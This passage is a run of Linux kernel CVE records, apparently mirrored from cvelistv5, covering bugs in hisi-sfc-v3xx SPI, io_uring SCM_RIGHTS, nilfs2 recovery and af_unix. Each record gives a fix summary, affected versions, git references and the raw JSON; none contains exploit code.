hisi_sfc_v3xx_isr+0x2c/0x40 [spi_hisi_sfc_v3xx]
__handle_irq_event_percpu+0x64/0x1e0
handle_irq_event+0x7c/0x1cc
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: a2ca53b52e007de81752bbb443d828f5950d6d04 Version: a2ca53b52e007de81752bbb443d828f5950d6d04 Version: a2ca53b52e007de81752bbb443d828f5950d6d04 Version: a2ca53b52e007de81752bbb443d828f5950d6d04 Version: a2ca53b52e007de81752bbb443d828f5950d6d04 Version: a2ca53b52e007de81752bbb443d828f5950d6d04 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.413Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e94da8aca2e78ef9ecca02eb211869eacd5504e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0399d7eba41d9b28f5bdd7757ec21a5b7046858d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f19361d570c67e7e014896fa2dacd7d721bf0aa8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d637b5118274701e8448f35953877daf04df18b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4168ac25b4bd378bd7dda322d589482a136c1fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de8b6e1c231a95abf95ad097b993d34b31458ec9"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26776",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:51:14.790934Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:54.556Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-hisi-sfc-v3xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e94da8aca2e78ef9ecca02eb211869eacd5504e5",
"status": "affected",
"version": "a2ca53b52e007de81752bbb443d828f5950d6d04",
"versionType": "git"
},
{
"lessThan": "0399d7eba41d9b28f5bdd7757ec21a5b7046858d",
"status": "affected",
"version": "a2ca53b52e007de81752bbb443d828f5950d6d04",
"versionType": "git"
},
{
"lessThan": "f19361d570c67e7e014896fa2dacd7d721bf0aa8",
"status": "affected",
"version": "a2ca53b52e007de81752bbb443d828f5950d6d04",
"versionType": "git"
},
{
"lessThan": "d637b5118274701e8448f35953877daf04df18b4",
"status": "affected",
"version": "a2ca53b52e007de81752bbb443d828f5950d6d04",
"versionType": "git"
},
{
"lessThan": "e4168ac25b4bd378bd7dda322d589482a136c1fd",
"status": "affected",
"version": "a2ca53b52e007de81752bbb443d828f5950d6d04",
"versionType": "git"
},
{
"lessThan": "de8b6e1c231a95abf95ad097b993d34b31458ec9",
"status": "affected",
"version": "a2ca53b52e007de81752bbb443d828f5950d6d04",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/spi/spi-hisi-sfc-v3xx.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: hisi-sfc-v3xx: Return IRQ_NONE if no interrupts were detected\n\nReturn IRQ_NONE from the interrupt handler when no interrupt was\ndetected. Because an empty interrupt will cause a null pointer error:\n\n Unable to handle kernel NULL pointer dereference at virtual\n address 0000000000000008\n Call trace:\n complete+0x54/0x100\n hisi_sfc_v3xx_isr+0x2c/0x40 [spi_hisi_sfc_v3xx]\n __handle_irq_event_percpu+0x64/0x1e0\n handle_irq_event+0x7c/0x1cc"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:12:31.225Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e94da8aca2e78ef9ecca02eb211869eacd5504e5"
},
{
"url": "https://git.kernel.org/stable/c/0399d7eba41d9b28f5bdd7757ec21a5b7046858d"
},
{
"url": "https://git.kernel.org/stable/c/f19361d570c67e7e014896fa2dacd7d721bf0aa8"
},
{
"url": "https://git.kernel.org/stable/c/d637b5118274701e8448f35953877daf04df18b4"
},
{
"url": "https://git.kernel.org/stable/c/e4168ac25b4bd378bd7dda322d589482a136c1fd"
},
{
"url": "https://git.kernel.org/stable/c/de8b6e1c231a95abf95ad097b993d34b31458ec9"
}
],
"title": "spi: hisi-sfc-v3xx: Return IRQ_NONE if no interrupts were detected",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26776",
"datePublished": "2024-04-03T17:01:02.116Z",
"dateReserved": "2024-02-19T14:20:24.177Z",
"dateUpdated": "2025-05-21T09:12:31.225Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52656 (GCVE-0-2023-52656)
Vulnerability from cvelistv5
Published
2024-05-13 13:12
Modified
2025-08-21 12:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
io_uring: drop any code related to SCM_RIGHTS
This is dead code after we dropped support for passing io_uring fds
over SCM_RIGHTS, get rid of it.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e Version: 2b188cc1bb857a9d4701ae59aa7768b5124e262e |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.313Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfb24022bb2c31f1f555dc6bc3cc5e2547446fb3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6771f343af90a25f3a14911634562bb5621df02"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d909d381c3152393421403be4b6435f17a2378b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a3812a47a32022ca76bf46ddacdd823dc2aabf8b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/88c49d9c896143cdc0f77197c4dcf24140375e89"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e5e6d274956305f1fc0340522b38f5f5be74bdb"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52656",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:43:19.379716Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:26.050Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/linux/io_uring_types.h",
"io_uring/filetable.c",
"io_uring/io_uring.c",
"io_uring/rsrc.c",
"io_uring/rsrc.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "cfb24022bb2c31f1f555dc6bc3cc5e2547446fb3",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "a6771f343af90a25f3a14911634562bb5621df02",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "d909d381c3152393421403be4b6435f17a2378b4",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "a3812a47a32022ca76bf46ddacdd823dc2aabf8b",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "6fc19b3d8a45ff0e5d50ec8184cee1d5eac1a8ba",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "88c49d9c896143cdc0f77197c4dcf24140375e89",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
},
{
"lessThan": "6e5e6d274956305f1fc0340522b38f5f5be74bdb",
"status": "affected",
"version": "2b188cc1bb857a9d4701ae59aa7768b5124e262e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/linux/io_uring_types.h",
"io_uring/filetable.c",
"io_uring/io_uring.c",
"io_uring/rsrc.c",
"io_uring/rsrc.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: drop any code related to SCM_RIGHTS\n\nThis is dead code after we dropped support for passing io_uring fds\nover SCM_RIGHTS, get rid of it."
}
],
"providerMetadata": {
"dateUpdated": "2025-08-21T12:08:49.536Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/cfb24022bb2c31f1f555dc6bc3cc5e2547446fb3"
},
{
"url": "https://git.kernel.org/stable/c/a6771f343af90a25f3a14911634562bb5621df02"
},
{
"url": "https://git.kernel.org/stable/c/d909d381c3152393421403be4b6435f17a2378b4"
},
{
"url": "https://git.kernel.org/stable/c/a3812a47a32022ca76bf46ddacdd823dc2aabf8b"
},
{
"url": "https://git.kernel.org/stable/c/6fc19b3d8a45ff0e5d50ec8184cee1d5eac1a8ba"
},
{
"url": "https://git.kernel.org/stable/c/88c49d9c896143cdc0f77197c4dcf24140375e89"
},
{
"url": "https://git.kernel.org/stable/c/6e5e6d274956305f1fc0340522b38f5f5be74bdb"
}
],
"title": "io_uring: drop any code related to SCM_RIGHTS",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52656",
"datePublished": "2024-05-13T13:12:35.333Z",
"dateReserved": "2024-03-06T09:52:12.099Z",
"dateUpdated": "2025-08-21T12:08:49.536Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26697 (GCVE-0-2024-26697)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix data corruption in dsync block recovery for small block sizes
The helper function nilfs_recovery_copy_block() of
nilfs_recovery_dsync_blocks(), which recovers data from logs created by
data sync writes during a mount after an unclean shutdown, incorrectly
calculates the on-page offset when copying repair data to the file's page
cache. In environments where the block size is smaller than the page
size, this flaw can cause data corruption and leak uninitialized memory
bytes during the recovery process.
Fix these issues by correcting this byte offset calculation on the page.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.662Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5278c3eb6bf5896417572b52adb6be9d26e92f65"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a6efe6dbaaf504f5b3f8a5c3f711fe54e7dda0ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/364a66be2abdcd4fd426ffa44d9b8f40aafb3caa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/120f7fa2008e3bd8b7680b4ab5df942decf60fd5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9c9c68d64fd3284f7097ed6ae057c8441f39fcd3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e1480538ef60bfee5473dfe02b1ecbaf1a4aa0d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2000016bab499074e6248ea85aeea7dd762355d9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/67b8bcbaed4777871bb0dcc888fb02a614a98ab1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26697",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:52:50.686290Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:29.604Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/recovery.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5278c3eb6bf5896417572b52adb6be9d26e92f65",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a6efe6dbaaf504f5b3f8a5c3f711fe54e7dda0ba",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "364a66be2abdcd4fd426ffa44d9b8f40aafb3caa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "120f7fa2008e3bd8b7680b4ab5df942decf60fd5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9c9c68d64fd3284f7097ed6ae057c8441f39fcd3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2e1480538ef60bfee5473dfe02b1ecbaf1a4aa0d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2000016bab499074e6248ea85aeea7dd762355d9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "67b8bcbaed4777871bb0dcc888fb02a614a98ab1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/nilfs2/recovery.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix data corruption in dsync block recovery for small block sizes\n\nThe helper function nilfs_recovery_copy_block() of\nnilfs_recovery_dsync_blocks(), which recovers data from logs created by\ndata sync writes during a mount after an unclean shutdown, incorrectly\ncalculates the on-page offset when copying repair data to the file\u0027s page\ncache. In environments where the block size is smaller than the page\nsize, this flaw can cause data corruption and leak uninitialized memory\nbytes during the recovery process.\n\nFix these issues by correcting this byte offset calculation on the page."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:54:18.520Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5278c3eb6bf5896417572b52adb6be9d26e92f65"
},
{
"url": "https://git.kernel.org/stable/c/a6efe6dbaaf504f5b3f8a5c3f711fe54e7dda0ba"
},
{
"url": "https://git.kernel.org/stable/c/364a66be2abdcd4fd426ffa44d9b8f40aafb3caa"
},
{
"url": "https://git.kernel.org/stable/c/120f7fa2008e3bd8b7680b4ab5df942decf60fd5"
},
{
"url": "https://git.kernel.org/stable/c/9c9c68d64fd3284f7097ed6ae057c8441f39fcd3"
},
{
"url": "https://git.kernel.org/stable/c/2e1480538ef60bfee5473dfe02b1ecbaf1a4aa0d"
},
{
"url": "https://git.kernel.org/stable/c/2000016bab499074e6248ea85aeea7dd762355d9"
},
{
"url": "https://git.kernel.org/stable/c/67b8bcbaed4777871bb0dcc888fb02a614a98ab1"
}
],
"title": "nilfs2: fix data corruption in dsync block recovery for small block sizes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26697",
"datePublished": "2024-04-03T14:54:57.848Z",
"dateReserved": "2024-02-19T14:20:24.156Z",
"dateUpdated": "2025-05-04T08:54:18.520Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38596 (GCVE-0-2024-38596)
Vulnerability from cvelistv5
Published
2024-06-19 13:45
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
af_unix: Fix data races in unix_release_sock/unix_stream_sendmsg
A data-race condition has been identified in af_unix. In one data path,
the write function unix_release_sock() atomically writes to
sk->sk_shutdown using WRITE_ONCE. However, on the reader side,
unix_stream_sendmsg() does not read it atomically. Consequently, this
issue is causing the following KCSAN splat to occur:
BUG: KCSAN: data-race in unix_release_sock / unix_stream_sendmsg
write (marked) to 0xffff88867256ddbb of 1 bytes by task 7270 on cpu 28:
unix_release_sock (net/unix/af_unix.c:640)
unix_release (net/unix/af_unix.c:1050)
sock_close (net/socket.c:659 net/socket.c:1421)
__fput (fs/file_table.c:422)
__fput_sync (fs/file_table.c:508)
__se_sys_close (fs/open.c:1559 fs/open.c:1541)
__x64_sys_close (fs/open.c:1541)
x64_sys_call (arch/x86/entry/syscall_64.c:33)
do_syscall_64 (arch/x86/entry/common.c:?)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)
read to 0xffff88867256ddbb of 1 bytes by task 989 on cpu 14:
unix_stream_sendmsg (net/unix/af_unix.c:2273)
__sock_sendmsg (net/socket.c:730 net/socket.c:745)
____sys_sendmsg (net/socket.c:2584)
__sys_sendmmsg (net/socket.c:2638 net/socket.c:2724)
__x64_sys_sendmmsg (net/socket.c:2753 net/socket.c:2750 net/socket.c:2750)
x64_sys_call (arch/x86/entry/syscall_64.c:33)
do_syscall_64 (arch/x86/entry/common.c:?)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)
value changed: 0x01 -> 0x03
The line numbers are related to commit dd5a440a31fa ("Linux 6.9-rc7").
Commit e1d09c2c2f57 ("af_unix: Fix data races around sk->sk_shutdown.")
addressed a comparable issue in the past regarding sk->sk_shutdown.
However, it overlooked resolving this particular data path.
This patch only offending unix_stream_sendmsg() function, since the
other reads seem to be protected by unix_state_lock() as discussed in
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:40.772Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fca6072e1a7b1e709ada5604b951513b89b4bd0a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de6641d213373fbde9bbdd7c4b552254bc9f82fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4d51845d734a4c5d079e56e0916f936a55e15055"
},
{
"tags": [
"x_transferred"
],
